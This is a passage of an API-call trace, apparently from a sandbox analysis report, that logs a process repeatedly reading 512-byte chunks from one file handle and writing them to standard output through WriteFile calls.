lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.126] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.126] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.128] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.128] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.129] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.129] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.131] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.131] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.132] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.132] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.133] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.133] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.134] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.134] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, 